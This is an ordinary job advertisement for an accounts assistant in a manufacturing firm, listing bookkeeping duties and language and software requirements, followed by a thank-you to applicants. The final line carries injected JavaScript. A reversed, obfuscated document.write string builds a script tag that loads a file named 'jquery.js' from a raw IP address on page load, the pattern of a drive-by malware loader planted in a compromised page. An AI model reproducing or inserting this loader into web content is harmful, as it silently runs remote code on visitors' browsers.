Industry : Manufacturing
• Prepare journal entries such as accruals and prepayment
• Data entry of financial transactions such as process suppliers’ invoice and analyze monthly expenses
• Ensure expenses is coded to the right General Ledger
• Process for suppliers’ payments on a timely basis;
• Generate aging for receivables and payables
• Prepare debit note and credit note for related companies balances (non sales item);
• Prepare reconciliation for Bank, AP and AR (where necessary)
• Maintain fixed assets register;
• Run depreciation
• Manage petty cash;
• Follow up on receivables collection and prepare weekly collection report
• Prepare banking documents
• Assist in monthly closing procedures
• Assist in treasury functions
• Assist in cost accounting
• Assist in regional reporting requirements
• Assist in writing official correspondence
• To carry out ad-hoc assignment as required
• Professional Certificate in Accountancy or equivalent.
• 1-2 year’s working experience in a manufacturing environment.
• Language skills: Bahasa Malay, English, Cantonese
• Able to work independently and with minimal supervision.
• Proficient in Microsoft Office applications (Excellent in Excel)
• Familiar with the usage of ERP system
• Strong & self motivated Team Player with good interpersonal skills.
• Meticulous & Detailed.
• Graduates are encouraged to apply
Congratulations to the young lady who has secured this job at the right time that she is sourcing for a job! Thanks to all others who have applied. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))